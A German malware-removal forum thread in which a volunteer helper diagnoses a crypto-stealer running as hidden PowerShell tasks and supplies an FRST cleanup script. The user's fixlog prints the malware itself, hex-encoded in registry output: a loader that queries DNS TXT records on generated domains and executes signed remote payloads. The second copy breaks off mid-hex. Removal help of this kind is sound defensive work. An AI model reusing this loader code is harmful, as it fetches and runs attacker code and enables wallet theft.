Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung
drei Unbekannte Powershell Prozesse

drei Unbekannte Powershell Prozesse


Plagegeister aller Art und deren Bekämpfung: drei Unbekannte Powershell Prozesse

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Thema geschlossen
Alt 24.10.2023, 13:35   #1
M-K-D-B
/// TB-Ausbilder
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse







Mein Name ist Matthias und ich werde dir bei der Analyse und Bereinigung deines Systems helfen.




Das ist ein Trojaner, der Krypto-Währungen und Krypto-Währungs-Wallets stiehlt (Crypto-Stealer).


Ich bereite ein Skript für dich vor...

Alt 24.10.2023, 13:49   #2
M-K-D-B
/// TB-Ausbilder
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse


Wir nutzen FRST, um die Malware und verwaiste Einträge zu entfernen.
Zudem überprüfen wir die Systemdateien auf Fehler.

Die Reparatur wird einige Minuten dauern, bitte gedulde dich.



Die Malware ist seit ca. 4 Wochen auf dem System, das nur so nebenbei





Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Skript ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System verwendet werden!
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
SystemRestore: On 
CreateRestorePoint:
CloseProcesses:
VirusTotal: C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1;C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1;C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1
Task: {6286BA08-0CCA-4E26-8FF0-69CFE16D411C} - System32\Tasks\Microsoft\Windows\Input\syncpensettings0HUDRN => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1" <==== ACHTUNG
C:\WINDOWS\System32\6764.tmp
CMD: reg query "HKLM\Software\RealteksHQZk7h" /S
DeleteKey: HKLM\Software\RealteksHQZk7h
Task: {0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1" <==== ACHTUNG
C:\WINDOWS\System32\80B6.tmp
CMD: reg query "HKLM\Software\UnwinderoMHQ2fNRF" /S
DeleteKey: HKLM\Software\UnwinderoMHQ2fNRF
Task: {31B09827-39E3-4AA5-B493-4669AFB8E011} - System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1" <==== ACHTUNG
C:\WINDOWS\System32\E7CD.tmp
CMD: reg query "HKLM\Software\NahimicNuHseCC" /S
DeleteKey: HKLM\Software\NahimicNuHseCC
HKLM\Software\Policies\...\system: [EnableActivityFeed] 0
HKLM\Software\Policies\...\system: [PublishUserActivities] 0
HKLM\Software\Policies\...\system: [UploadUserActivities] 0
HKLM\Software\Policies\...\system: [AllowCrossDeviceClipboard] 0
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [AMDNoiseSuppression] => "C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe" (Keine Datei)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\...\Run: [MicrosoftEdgeAutoLaunch_4F3ACAD5137A03F38014355EA53C9FBD] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4187176 2023-10-20] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> 
GroupPolicy: Beschränkung ? <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe  (Keine Datei)
Task: {7E359839-10FF-4083-92B7-07B6F17CF925} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe  /RunOnAC RebootDialog (Keine Datei)
Task: {05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe  /RunOnBattery RebootDialog (Keine Datei)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (Keine Datei)
Task: {002C80C5-1CE2-4C73-8E35-D7B5AE35E00A} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe  (Keine Datei)
S3 HWiNFO_180; \??\C:\Users\*****\AppData\Local\Temp\HWiNFO64A_180.SYS [X] <==== ACHTUNG
S1 npcap; \SystemRoot\system32\DRIVERS\npcap.sys [X]
U4 npcap_wifi; kein ImagePath
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
FF Extension: (Bypass Paywalls Clean) - C:\Users\AllUserName\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi [2023-10-15] [UpdateUrl:hxxps://gitlab.com/magnolia1234/bypass-paywalls-firefox-clean/-/raw/master/updates.json]
CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv
CMD: netsh winsock reset
CMD: netsh int ip reset
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: ipconfig /registerdns
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository 
CMD: Winmgmt /resetrepository 
CMD: winmgmt /resyncperf
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: sfc /scannow
Hosts:
RemoveProxy:
EmptyTemp:
End::
  • Starte nun FRST und klicke direkt auf den Button Reparieren.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!

  • Wichtig:
    • Bitte gedulde dich, sobald du die Reparatur gestartet hast. Je nach Art und Umfang der notwendigen Reparaturen kann dies einige Minuten dauern.
      Eventuell erhältst du während der Reparatur auch die Information "keine Rückmeldung" von FRST. Das ist normal, du musst nichts weiter tun, nur warten.
    • Mit dieser Reparatur werden alle temporären Dateien/Browserdaten sowie der Papierkorb gelöscht.
    • Mit dieser Reparatur werden die Windows Firewall-Einstellungen zurückgesetzt. Du wirst möglicherweise später aufgefordert, legitimen Programmen eine Erlaubnis/Ausnahme für die Firewall zu erteilen. Dies solltest du dann erlauben/zulassen.

  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.
__________________
Alt 24.10.2023, 14:38   #3
Pun99
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse


Hallo Matthias,

vielen Dank für deine Zeit.
Die Reparatur konnte durchgeführt werden.
Zumindest im Moment schaut es nach einem Erfolg aus.

Die Links zu VirusTotal sagen mir, dass der Defender die Schädlinge nicht kennt.
Gilt die Empfehlung für den Defender denn noch, oder sollte ich andere Software zum Schutz benutzen?

Interessant finde ich auch wie du zu dieser Lösung gekommen bist, gibt es da Texte dazu um sowas selbst bewerkstelligen zu können?


Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 06-10-2023
durchgeführt von doppo (24-10-2023 14:56:55) Run:1
Gestartet von D:\downloads
Geladene Profile: doppo & kids
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Start::
SystemRestore: On 
CreateRestorePoint:
CloseProcesses:
VirusTotal: C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1;C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1;C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1
Task: {6286BA08-0CCA-4E26-8FF0-69CFE16D411C} - System32\Tasks\Microsoft\Windows\Input\syncpensettings0HUDRN => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1" <==== ACHTUNG
C:\WINDOWS\System32\6764.tmp
CMD: reg query "HKLM\Software\RealteksHQZk7h" /S
DeleteKey: HKLM\Software\RealteksHQZk7h
Task: {0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1" <==== ACHTUNG
C:\WINDOWS\System32\80B6.tmp
CMD: reg query "HKLM\Software\UnwinderoMHQ2fNRF" /S
DeleteKey: HKLM\Software\UnwinderoMHQ2fNRF
Task: {31B09827-39E3-4AA5-B493-4669AFB8E011} - System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1" <==== ACHTUNG
C:\WINDOWS\System32\E7CD.tmp
CMD: reg query "HKLM\Software\NahimicNuHseCC" /S
DeleteKey: HKLM\Software\NahimicNuHseCC
HKLM\Software\Policies\...\system: [EnableActivityFeed] 0
HKLM\Software\Policies\...\system: [PublishUserActivities] 0
HKLM\Software\Policies\...\system: [UploadUserActivities] 0
HKLM\Software\Policies\...\system: [AllowCrossDeviceClipboard] 0
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [AMDNoiseSuppression] => "C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe" (Keine Datei)
HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\...\Run: [MicrosoftEdgeAutoLaunch_4F3ACAD5137A03F38014355EA53C9FBD] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4187176 2023-10-20] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> 
GroupPolicy: Beschränkung ? <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe  (Keine Datei)
Task: {7E359839-10FF-4083-92B7-07B6F17CF925} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe  /RunOnAC RebootDialog (Keine Datei)
Task: {05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe  /RunOnBattery RebootDialog (Keine Datei)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (Keine Datei)
Task: {002C80C5-1CE2-4C73-8E35-D7B5AE35E00A} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe  (Keine Datei)
S3 HWiNFO_180; \??\C:\Users\*****\AppData\Local\Temp\HWiNFO64A_180.SYS [X] <==== ACHTUNG
S1 npcap; \SystemRoot\system32\DRIVERS\npcap.sys [X]
U4 npcap_wifi; kein ImagePath
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
FF Extension: (Bypass Paywalls Clean) - C:\Users\AllUserName\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi [2023-10-15] [UpdateUrl:hxxps://gitlab.com/magnolia1234/bypass-paywalls-firefox-clean/-/raw/master/updates.json]
CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv
CMD: netsh winsock reset
CMD: netsh int ip reset
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: ipconfig /registerdns
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository 
CMD: Winmgmt /resetrepository 
CMD: winmgmt /resyncperf
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: sfc /scannow
Hosts:
RemoveProxy:
EmptyTemp:
End::
*****************

SystemRestore: On => abgeschlossen
Wiederherstellungspunkt wurde erfolgreich erstellt.
Prozesse erfolgreich geschlossen.
VirusTotal: C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1 => https://www.virustotal.com/gui/file/8ea840c5e0288c5eb3c0331d71597db0b1bb0df669a12eb2cd7decfb1d7f5554/detection/f-8ea840c5e0288c5eb3c0331d71597db0b1bb0df669a12eb2cd7decfb1d7f5554-1698152235
VirusTotal: C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1 => https://www.virustotal.com/gui/file/2f6dbfd25142f0cf3681bb3aa091ed30a9a7bd87bcb8d79932972005741ae6a7/detection/f-2f6dbfd25142f0cf3681bb3aa091ed30a9a7bd87bcb8d79932972005741ae6a7-1698152236
VirusTotal: C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1 => https://www.virustotal.com/gui/file/c0c40adc55d8bdc67ca0a9070db624b8ad8475dc6359c53df97ac4bbe776ec7c/detection/f-c0c40adc55d8bdc67ca0a9070db624b8ad8475dc6359c53df97ac4bbe776ec7c-1698152237
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6286BA08-0CCA-4E26-8FF0-69CFE16D411C}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6286BA08-0CCA-4E26-8FF0-69CFE16D411C}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Input\syncpensettings0HUDRN => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Input\syncpensettings0HUDRN" => erfolgreich entfernt

"C:\WINDOWS\System32\6764.tmp" Ordner verschieben:

C:\WINDOWS\System32\6764.tmp => erfolgreich verschoben

========= reg query "HKLM\Software\RealteksHQZk7h" /S =========


HKEY_LOCAL_MACHINE\Software\RealteksHQZk7h
    THk9xu3    REG_BINARY    2732463335343445382D453646452D343446412D393138392D303831384639333639343538273B0D0A246D73203D205B494F2E4D656D6F727953747265616D5D3A3A6E657728293B0D0A0D0A66756E6374696F6E204765742D55706461746573207B0D0A20202020706172616D20280D0A202020202020202024686F73746E616D650D0A20202020290D0A20202020747279207B0D0A202020202020202024646E73203D205265736F6C76652D446E734E616D65202D4E616D652024686F73746E616D65202D54797065202754585427200D0A2020202020202020246D732E5365744C656E6774682830293B0D0A2020202020202020246D732E506F736974696F6E203D20303B0D0A2020202020202020666F726561636820282474787420696E2024646E7329207B0D0A202020202020202020202020747279207B0D0A2020202020202020202020202020202069662028247478742E54797065202D6E6520275458542729207B0D0A2020202020202020202020202020202020202020636F6E74696E75653B0D0A202020202020202020202020202020207D0D0A2020202020202020202020202020202024706B74203D205B737472696E675D3A3A4A6F696E2827272C20247478742E537472696E6773293B0D0A202020202020202020202020202020206966202824706B745B305D202D657120272E2729207B0D0A2020202020202020202020202020202020202020246470203D20285B747970655D2828285B72656765785D3A3A4D6174636865732827747265766E6F43272C272E272C275269676874546F4C6566742729207C20466F7245616368207B245F2E76616C75657D29202D6A6F696E2027272929292E4765744D6574686F647328295B3330365D2E496E766F6B6528246E756C6C2C2040282824706B742E537562737472696E672831292E5265706C61636528275F272C20272B27292929293B0D0A2020202020202020202020202020202020202020246D732E506F736974696F6E203D205B426974436F6E7665727465725D3A3A546F55496E743332282464702C2030293B0D0A2020202020202020202020202020202020202020246D732E5772697465282464702C20342C202464702E4C656E677468202D2034293B0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A2020202020202020202020206361746368207B0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028246D732E4C656E677468202D67742031333629207B0D0A202020202020202020202020246D732E506F736974696F6E203D20303B0D0A20202020202020202020202024736967203D205B627974655B5D5D3A3A6E657728313238293B0D0A2020202020202020202020202474696D657374616D70203D205B627974655B5D5D3A3A6E65772838293B0D0A20202020202020202020202024627566666572203D205B627974655B5D5D3A3A6E657728246D732E4C656E677468202D20313336293B0D0A202020202020202020202020246D732E5265616428247369672C20302C2031323829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E52656164282474696D657374616D702C20302C203829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E5265616428246275666665722C20302C20246275666665722E4C656E67746829207C204F75742D4E756C6C3B0D0A202020202020202020202020247075626B6579203D205B53656375726974792E43727970746F6772617068792E52534143727970746F5365727669636550726F76696465725D3A3A6E657728293B0D0A09202020205B627974655B5D5D24627974617272203D20362C322C302C302C302C3136342C302C302C38322C38332C36352C34392C302C342C302C302C312C302C312C302C3137312C3133362C31392C3133392C3231352C33312C3136392C3234322C3133332C31312C3134362C3130352C37392C31332C3134302C38382C3131392C302C322C3234392C37392C31372C37372C3135322C3232382C3136322C33312C35362C3131372C38392C36382C3138322C3139342C3137302C3235302C31362C332C37382C3130342C39322C33372C33372C392C3235302C3136342C3234342C3139352C3131382C39322C3139302C35382C32302C33352C3133342C38332C31302C3232392C3131342C3232392C3133372C3234342C3137382C31302C33312C34362C38302C3232312C37332C3132392C3234302C3138332C392C3234352C3137372C3139362C37372C3134332C37312C3134322C36302C352C3131372C3234312C35342C322C3131362C32332C3232352C3134352C35332C34362C32312C3134322C3135382C3230362C3235302C3138312C3234312C382C3131302C3130312C38342C3231382C3231392C39392C3139362C3139352C3131322C37312C39332C35352C3131312C3231382C3230392C31322C3130312C3136352C34352C31332C33362C3131382C39372C3233322C3139332C3234352C3232312C3138302C3136390D0A202020202020202020202020247075626B65792E496D706F7274437370426C6F622824627974617272293B0D0A20202020202020202020202069662028247075626B65792E5665726966794461746128246275666665722C205B53656375726974792E43727970746F6772617068792E43727970746F436F6E6669675D3A3A4D61704E616D65546F4F4944282753484132353627292C20247369672929207B0D0A2020202020202020202020202020202072657475726E20407B0D0A202020202020202020202020202020202020202074696D657374616D70203D20285B53797374656D2E426974436F6E7665727465725D3A3A546F55496E743634282474696D657374616D702C203029293B0D0A2020202020202020202020202020202020202020746578742020202020203D20285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282462756666657229293B0D0A202020202020202020202020202020207D3B0D0A2020202020202020202020207D200D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202072657475726E20246E756C6C3B0D0A7D0D0A0D0A7768696C652028247472756529207B0D0A20202020747279207B0D0A202020202020202024757064617465203D20407B0D0A20202020202020202020202074696D657374616D70203D20303B0D0A202020202020202020202020746578742020202020203D2027273B2020202020202020202020200D0A20202020202020207D3B0D0A2020202020202020666F72656163682028246320696E2028402822636F6D222C202278797A22292929207B0D0A202020202020202020202020666F72656163682028246120696E2028402822776D61696C222C20226661697275222C2022626964656F222C202270726976617470726F7879222C202261686F7261766964656F22292929207B0D0A20202020202020202020202020202020666F72656163682028246220696E2028402822656E64706F696E74222C2022626C6F67222C202263686174222C202263646E222C20227363686E656C6C76706E22292929207B0D0A2020202020202020202020202020202020202020747279207B0D0A2020202020202020202020202020202020202020202020202468203D202224612D24622E2463223B0D0A2020202020202020202020202020202020202020202020202472203D204765742D557064617465732024680D0A20202020202020202020202020202020202020202020202069662028246E756C6C202D6E6520247229207B0D0A202020202020202020202020202020202020202020202020202020206966202824722E74696D657374616D70202D677420247570646174652E74696D657374616D7029207B0D0A202020202020202020202020202020202020202020202020202020202020202024757064617465203D2024723B0D0A202020202020202020202020202020202020202020202020202020207D0D0A2020202020202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020206361746368207B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028247570646174652E7465787429207B0D0A202020202020202020202020246A6F62203D2053746172742D4A6F62202D536372697074426C6F636B20285B736372697074626C6F636B5D3A3A43726561746528247570646174652E7465787429293B0D0A202020202020202020202020246A6F62207C20576169742D4A6F62202D54696D656F75742031343430303B0D0A202020202020202020202020246A6F62207C2053746F702D4A6F623B0D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202053746172742D536C656570202D5365636F6E64732033303B0D0A7D0D0A



========= Ende von CMD: =========

HKLM\Software\RealteksHQZk7h => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n" => erfolgreich entfernt

"C:\WINDOWS\System32\80B6.tmp" Ordner verschieben:

C:\WINDOWS\System32\80B6.tmp => erfolgreich verschoben

========= reg query "HKLM\Software\UnwinderoMHQ2fNRF" /S =========


HKEY_LOCAL_MACHINE\Software\UnwinderoMHQ2fNRF
    ZzHqeu6    REG_BINARY    2732463643363243342D383341312D343431362D393934342D384337363333373441463833273B0D0A246D73203D205B494F2E4D656D6F727953747265616D5D3A3A6E657728293B0D0A0D0A66756E6374696F6E204765742D55706461746573207B0D0A20202020706172616D20280D0A202020202020202024686F73746E616D650D0A20202020290D0A20202020747279207B0D0A202020202020202024646E73203D205265736F6C76652D446E734E616D65202D4E616D652024686F73746E616D65202D54797065202754585427200D0A2020202020202020246D732E5365744C656E6774682830293B0D0A2020202020202020246D732E506F736974696F6E203D20303B0D0A2020202020202020666F726561636820282474787420696E2024646E7329207B0D0A202020202020202020202020747279207B0D0A2020202020202020202020202020202069662028247478742E54797065202D6E6520275458542729207B0D0A2020202020202020202020202020202020202020636F6E74696E75653B0D0A202020202020202020202020202020207D0D0A2020202020202020202020202020202024706B74203D205B737472696E675D3A3A4A6F696E2827272C20247478742E537472696E6773293B0D0A202020202020202020202020202020206966202824706B745B305D202D657120272E2729207B0D0A2020202020202020202020202020202020202020246470203D20285B747970655D2828285B72656765785D3A3A4D6174636865732827747265766E6F43272C272E272C275269676874546F4C6566742729207C20466F7245616368207B245F2E76616C75657D29202D6A6F696E2027272929292E4765744D6574686F647328295B3330365D2E496E766F6B6528246E756C6C2C2040282824706B742E537562737472696E672831292E5265706C61636528275F272C20272B27292929293B0D0A2020202020202020202020202020202020202020246D732E506F736974696F6E203D205B426974436F6E7665727465725D3A3A546F55496E743332282464702C2030293B0D0A2020202020202020202020202020202020202020246D732E5772697465282464702C20342C202464702E4C656E677468202D2034293B0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A2020202020202020202020206361746368207B0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028246D732E4C656E677468202D67742031333629207B0D0A202020202020202020202020246D732E506F736974696F6E203D20303B0D0A20202020202020202020202024736967203D205B627974655B5D5D3A3A6E657728313238293B0D0A2020202020202020202020202474696D657374616D70203D205B627974655B5D5D3A3A6E65772838293B0D0A20202020202020202020202024627566666572203D205B627974655B5D5D3A3A6E657728246D732E4C656E677468202D20313336293B0D0A202020202020202020202020246D732E5265616428247369672C20302C2031323829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E52656164282474696D657374616D702C20302C203829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E5265616428246275666665722C20302C20246275666665722E4C656E67746829207C204F75742D4E756C6C3B0D0A202020202020202020202020247075626B6579203D205B53656375726974792E43727970746F6772617068792E52534143727970746F5365727669636550726F76696465725D3A3A6E657728293B0D0A09202020205B627974655B5D5D24627974617272203D20362C322C302C302C302C3136342C302C302C38322C38332C36352C34392C302C342C302C302C312C302C312C302C3137312C3133362C31392C3133392C3231352C33312C3136392C3234322C3133332C31312C3134362C3130352C37392C31332C3134302C38382C3131392C302C322C3234392C37392C31372C37372C3135322C3232382C3136322C33312C35362C3131372C38392C36382C3138322C3139342C3137302C3235302C31362C332C37382C3130342C39322C33372C33372C392C3235302C3136342C3234342C3139352C3131382C39322C3139302C35382C32302C33352C3133342C38332C31302C3232392C3131342C3232392C3133372C3234342C3137382C31302C33312C34362C38302C3232312C37332C3132392C3234302C3138332C392C3234352C3137372C3139362C37372C3134332C37312C3134322C36302C352C3131372C3234312C35342C322C3131362C32332C3232352C3134352C35332C34362C32312C3134322C3135382C3230362C3235302C3138312C3234312C382C3131302C3130312C38342C3231382C3231392C39392C3139362C3139352C3131322C37312C39332C35352C3131312C3231382C3230392C31322C3130312C3136352C34352C31332C33362C3131382C39372C3233322C3139332C3234352C3232312C3138302C3136390D0A202020202020202020202020247075626B65792E496D706F7274437370426C6F622824627974617272293B0D0A20202020202020202020202069662028247075626B65792E5665726966794461746128246275666665722C205B53656375726974792E43727970746F6772617068792E43727970746F436F6E6669675D3A3A4D61704E616D65546F4F4944282753484132353627292C20247369672929207B0D0A2020202020202020202020202020202072657475726E20407B0D0A202020202020202020202020202020202020202074696D657374616D70203D20285B53797374656D2E426974436F6E7665727465725D3A3A546F55496E743634282474696D657374616D702C203029293B0D0A2020202020202020202020202020202020202020746578742020202020203D20285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282462756666657229293B0D0A202020202020202020202020202020207D3B0D0A2020202020202020202020207D200D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202072657475726E20246E756C6C3B0D0A7D0D0A0D0A7768696C652028247472756529207B0D0A20202020747279207B0D0A202020202020202024757064617465203D20407B0D0A20202020202020202020202074696D657374616D70203D20303B0D0A202020202020202020202020746578742020202020203D2027273B2020202020202020202020200D0A20202020202020207D3B0D0A2020202020202020666F72656163682028246320696E2028402822636F6D222C202278797A22292929207B0D0A202020202020202020202020666F72656163682028246120696E2028402822776D61696C222C20226661697275222C2022626964656F222C202270726976617470726F7879222C202261686F7261766964656F22292929207B0D0A20202020202020202020202020202020666F72656163682028246220696E2028402822656E64706F696E74222C2022626C6F67222C202263686174222C202263646E222C20227363686E656C6C76706E22292929207B0D0A2020202020202020202020202020202020202020747279207B0D0A2020202020202020202020202020202020202020202020202468203D202224612D24622E2463223B0D0A2020202020202020202020202020202020202020202020202472203D204765742D557064617465732024680D0A20202020202020202020202020202020202020202020202069662028246E756C6C202D6E6520247229207B0D0A202020202020202020202020202020202020202020202020202020206966202824722E74696D657374616D70202D677420247570646174652E74696D657374616D7029207B0D0A202020202020202020202020202020202020202020202020202020202020202024757064617465203D2024723B0D0A202020202020202020202020202020202020202020202020202